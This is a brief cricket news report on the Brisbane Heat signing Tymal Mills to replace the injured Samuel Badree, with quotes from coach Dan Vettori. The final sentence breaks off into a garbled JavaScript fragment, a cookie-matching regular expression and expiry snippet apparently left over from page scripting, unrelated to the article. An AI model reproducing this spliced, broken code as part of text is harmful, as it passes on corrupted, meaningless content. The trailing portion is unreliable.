The Brisbane Heat have signed English Twenty20 representative and left arm fast bowler, Tymal Mills, as an injury replacement for West Indian leg spinner Samuel Badree.

Mills has been signed to play matches against the Perth Scorchers and the Melbourne Stars, with Badree suffering a minor hamstring strain.

"With Sam Badree and Josh Lalor both out injured at the moment, the opportunity to provide additional variety to the attack was very attractive," said Heat coach Dan Vettori.

"Tymal has been going well for Auckland so he is match-ready.

"We're looking forward to having him join us and prepare for the matches ahead at the Gabba and the MCG where the conditions should suit him."

Mills made his English T20I debut last July against Sri Lanka and he took 10 wickets in 10 matches playing for the Auckland Aces in the New Zealand Super Smash in December last year. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
